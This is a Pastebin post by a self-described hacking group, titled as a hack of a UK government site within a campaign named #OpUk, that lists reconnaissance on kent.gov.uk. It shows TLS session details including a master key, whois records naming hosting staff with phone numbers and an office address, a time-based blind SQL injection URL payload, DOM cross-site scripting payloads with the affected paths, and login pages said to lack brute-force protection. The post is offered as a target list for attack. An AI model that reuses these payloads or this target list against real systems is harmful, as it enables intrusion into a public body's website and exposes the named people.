API tools faq
paste
Advertisement
Cyb3r_h4ck3r

#OpUk gov.uk hacked By Team IHC

Cyb3r_h4ck3r
Jan 26th, 2015
3,151
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.37 KB | None | 0 0
raw download clone embed print report
  1. #Team IHC #OpUk
  2.  
  3. (+)kent.gov.uk:
  4.  
  5. SSL Certificate:
  6.  
  7. CONNECTED(00000003)
  8. depth=0 /C=AU/ST=New South Wales/L=Sydney/O=Squiz Pty Ltd/CN=*.squizedge.net
  9. verify error:num=20:unable to get local issuer certificate
  10. verify return:1
  11. depth=0 /C=AU/ST=New South Wales/L=Sydney/O=Squiz Pty Ltd/CN=*.squizedge.net
  12. verify error:num=27:certificate not trusted
  13. verify return:1
  14. depth=0 /C=AU/ST=New South Wales/L=Sydney/O=Squiz Pty Ltd/CN=*.squizedge.net
  15. verify error:num=21:unable to verify the first certificate
  16. verify return:1
  17. ---
  18. Certificate chain
  19. 0 s:/C=AU/ST=New South Wales/L=Sydney/O=Squiz Pty Ltd/CN=*.squizedge.net
  20. i:/C=US/O=GeoTrust Inc./CN=GeoTrust SSL CA - G2
  21. ---
  22. Server certificate
  23. -----BEGIN CERTIFICATE-----
  24. MIIFsTCCBJmgAwIBAgIQPcEG6bFdZcejnCG/DVkH4TANBgkqhkiG9w0BAQsFADBE
  25. MQswCQYDVQQGEwJVUzEWMBQGA1UEChMNR2VvVHJ1c3QgSW5jLjEdMBsGA1UEAxMU
  26. R2VvVHJ1c3QgU1NMIENBIC0gRzIwHhcNMTQwNTI4MDAwMDAwWhcNMTYwNTI3MjM1
  27. OTU5WjBqMQswCQYDVQQGEwJBVTEYMBYGA1UECBMPTmV3IFNvdXRoIFdhbGVzMQ8w
  28. DQYDVQQHFAZTeWRuZXkxFjAUBgNVBAoUDVNxdWl6IFB0eSBMdGQxGDAWBgNVBAMU
  29. Dyouc3F1aXplZGdlLm5ldDCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIB
  30. AJUDzE2uadWk2IyOIPdOA6YYFafdrX+sODC/pGqNABA4/1FuVhOKzX2plbc/3nri
  31. 4RLP0yQ2lDxcKMEgdN5B9I4U32xdn8xkhIYzDbEJODCV2u/WZ9cZQ4VIyZRBOar6
  32. Sax5Pq4gx3fjLWk5p9jxEpxoLVafVBBdgikw9vREjLHqEpy/5TYTFADJSGi3QmW1
  33. h9zMTT+sOiTZdZYaE4llZ388Fbm/u53JkBVONFXBIK/r3JAtz/kygZh0kjcEleSe
  34. sUd2dlsRmc7s73vlBPfqQ1wAOCyGoTlXeVQ3rKGjVEH9KphymtSfO1W/uZtHTrhp
  35. Wt/eCwmIqivU36mILqhSgq8x9NCT5t4g5ftYoSp8r7EAPl2cGjE+OuKRryEVXSh0
  36. y7PjchrQmBGLR2N1gP4POM+ulCJ8qyg0LwNs5yuhieQn4Q8sGIHZ8cdhrfmJF9HT
  37. nw7k9fbBn1rzZs5N5+cuelbTWaSts7yqmWYiWJk8C2SMjgpTaz/gTOSygSzINQdr
  38. wMH/e6FrycphJXc98nTWK2lUQUzmjNkvoJEhrNFrRtglZLhqdzAn5KPo6vOqntJn
  39. fZ0vjQsEv3Ogzwec2ih4TP/156UDY3+HCWunmNto/ZLzSiFgEowenxoCjGKN0bJ/
  40. iBs+UeUu5NweHWsTAlKKE81iolFkS6MaAbf9YnHbG0CBAgMBAAGjggF3MIIBczAp
  41. BgNVHREEIjAggg8qLnNxdWl6ZWRnZS5uZXSCDXNxdWl6ZWRnZS5uZXQwCQYDVR0T
  42. BAIwADAOBgNVHQ8BAf8EBAMCBaAwKwYDVR0fBCQwIjAgoB6gHIYaaHR0cDovL2di
  43. LnN5bWNiLmNvbS9nYi5jcmwwZQYDVR0gBF4wXDBaBgpghkgBhvhFAQc2MEwwIwYI
  44. KwYBBQUHAgEWF2h0dHBzOi8vZC5zeW1jYi5jb20vY3BzMCUGCCsGAQUFBwICMBkW
  45. F2h0dHBzOi8vZC5zeW1jYi5jb20vcnBhMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggr
  46. BgEFBQcDAjAfBgNVHSMEGDAWgBQRStBzOdVbaQhcuj2/ZJqoixxVvDBXBggrBgEF
  47. BQcBAQRLMEkwHwYIKwYBBQUHMAGGE2h0dHA6Ly9nYi5zeW1jZC5jb20wJgYIKwYB
  48. BQUHMAKGGmh0dHA6Ly9nYi5zeW1jYi5jb20vZ2IuY3J0MA0GCSqGSIb3DQEBCwUA
  49. A4IBAQBbgYxNjqmz//c8hYpZqOuVRlsIDtOrRAADot7hlSjBT8xhM6EdcxB11mE4
  50. 7xeogF5nxS4a3P8pnZlB/iutbRu5IWay+xSdvdcQgZDF0oeVUzQE0/mkyQfZnVWn
  51. 8LiIniTQ6vFiBzGMo82PfGfUAU9clps3cHWEwC8eK0+fKZUW22zzATub1YAAuWw4
  52. sfDYHois5k1XmP5vXaXHTPLIz2MnJKiD83IlnawVSBt9vh2KJseXoYOeLyMYn1Ax
  53. Qrf/aLzSN6D14amXmnhJ3tZ5k/oFb9w/7OnP85gUKF7uDWm6VyfchPJhA/T6wvk6
  54. ZfHq1cHtFDa8gxmPzNKPvevuFyrh
  55. -----END CERTIFICATE-----
  56. subject=/C=AU/ST=New South Wales/L=Sydney/O=Squiz Pty Ltd/CN=*.squizedge.net
  57. issuer=/C=US/O=GeoTrust Inc./CN=GeoTrust SSL CA - G2
  58. ---
  59. No client certificate CA names sent
  60. ---
  61. SSL handshake has read 1630 bytes and written 703 bytes
  62. ---
  63. New, TLSv1/SSLv3, Cipher is AES128-SHA
  64. Server public key is 4096 bit
  65. Secure Renegotiation IS supported
  66. Compression: NONE
  67. Expansion: NONE
  68. SSL-Session:
  69. Protocol : TLSv1
  70. Cipher : AES128-SHA
  71. Session-ID: A48D88170A718C95BC8719DBF28BE6C4DAFCE7B840649CF95B3EEC046E870463
  72. Session-ID-ctx:
  73. Master-Key: 76EE4739599019D08F0C900AFBA8DA468885F13E010AFA698D42BF3DC04A43D21ADD1C006CAAAF92A725439F48CC17AB
  74. Key-Arg : None
  75. Start Time: 1414918261
  76. Timeout : 300 (sec)
  77.  
  78. http://www.kent.gov.uk/
  79.  
  80. inetnum: 176.65.66.0 - 176.65.66.255
  81. netname: TBSH-CLIENT-SQUIZ-UK
  82. descr: TBSH Client Network - Squiz-UK - Ash routed 4
  83. country: GB
  84. admin-c: BR2458-RIPE
  85. admin-c: SM16671-RIPE
  86. tech-c: BR2458-RIPE
  87. tech-c: SM16671-RIPE
  88. status: ASSIGNED PA
  89. mnt-by: BUNKER-MNT
  90. source: RIPE # Filtered
  91.  
  92. person: Bill Rafferty
  93. address: Squiz UK Ltd
  94. address: Zetland House
  95. address: 109 - 123 Clifton St
  96. address: London
  97. address: EC2A 4LD
  98. phone: +44 2071 018300
  99. nic-hdl: BR2458-RIPE
  100. source: RIPE # Filtered
  101. mnt-by: BUNKER-MNT
  102.  
  103. person: Stephen Morgan
  104. address: Squiz UK Ltd
  105. address: Zetland House
  106. address: 109 - 123 Clifton St
  107. address: London
  108. address: EC2A 4LD
  109. phone: +44 2071 018300
  110. nic-hdl: SM16671-RIPE
  111. source: RIPE # Filtered
  112. mnt-by: BUNKER-MNT
  113.  
  114. % Information related to '176.65.64.0/22AS24958'
  115.  
  116. route: 176.65.64.0/22
  117. descr: The Bunker Secure Hosting Ltd - Allocation 4 Part 1
  118. origin: AS24958
  119. mnt-by: BUNKER-MNT
  120. source: RIPE # Filtered
  121.  
  122. Blind SQL Injection on: /business/if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*//consumer-protection/consumer-alerts/trading-standards-alert-chatham-and-clarendon-grammar-school,-ramsgate-crowned-young-consumers-of-the-year-2014
  123.  
  124. DOM-based cross site scripting: /business/trading-standards/trading-standards-business-advice/business-advice-by-topic/business-advice
  125.  
  126. Location: http://www.kent.gov.uk/business/trading-standards/trading-standards-business-advice/business-advice-by-topic/business-advice?wvstest=javascript:domxssExecutionSink(1,"<br>()locxss")frmClient=javascript:domxssExecutionSink(1,"<br>()locxss")frmItemID=javascript:domxssExecutionSink(1,"<br>()locxss")frmShared=javascript:domxssExecutionSink(1,"<br>()locxss")&
  127.  
  128. Execution Sink: document.write
  129. HTML code written:
  130.  
  131. frmClient=javascript:domxssExecutionSink(1,"<br>()locxss")frmItemID=javascript:domxssExecutionSink(1,"<br>()locxss")frmShared=javascript:domxssExecutionSink(1,"<br>()locxss") ...Stack Trace:
  132. at http://www.kent.gov.uk/business/trading-standards/trading-standards-business-advice/business-advice-by-topic/business-advice?wvstest=javascript:domxssExecutionSink(1,%22%3Cbr%3E()locxss%22)frmClient=javascript:domxssExecutionSink(1,%22%3Cbr%3E()locxss%22)frmItemID=javascript:domxssExecutionSink(1,%22%3Cbr%3E()locxss%22)frmShared=javascript:domxssExecutionSink(1,%22%3Cbr%3E()locxss%22)&:193
  133.  
  134. - and
  135.  
  136. /business/trading-standards/trading-standards-business-advice/business-advice-by-topic/business-advice
  137.  
  138. Location: http://www.kent.gov.uk/business/trading-standards/trading-standards-business-advice/business-advice-by-topic/business-advice?wvstest=javascript:domxssExecutionSink(1,"<br>()locxss")frmClient=javascript:domxssExecutionSink(1,"<br>()locxss")frmItemID=javascript:domxssExecutionSink(1,"<br>()locxss")frmShared=javascript:domxssExecutionSink(1,"<br>()locxss")&
  139.  
  140. Execution Sink: document.write
  141. HTML code written:
  142.  
  143. &frmItemID=javascript:domxssExecutionSink(1,"<br>()locxss")frmShared=javascript:domxssExecutionSink(1,"<br>()locxss") ...Stack Trace:
  144. at http://www.kent.gov.uk/business/trading-standards/trading-standards-business-advice/business-advice-by-topic/business-advice?wvstest=javascript:domxssExecutionSink(1,%22%3Cbr%3E()locxss%22)frmClient=javascript:domxssExecutionSink(1,%22%3Cbr%3E()locxss%22)frmItemID=javascript:domxssExecutionSink(1,%22%3Cbr%3E()locxss%22)frmShared=javascript:domxssExecutionSink(1,%22%3Cbr%3E()locxss%22)&:194
  145.  
  146. Login-page withput any protection aganst password-guessing attack (brute-froce):
  147.  
  148. /_designs/news/
  149. /_media/
  150. /_media/kcc/
  151. /_media/kcc/documents
  152. /leisure-and-community/youth-centres-and-projects/youth-centres
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!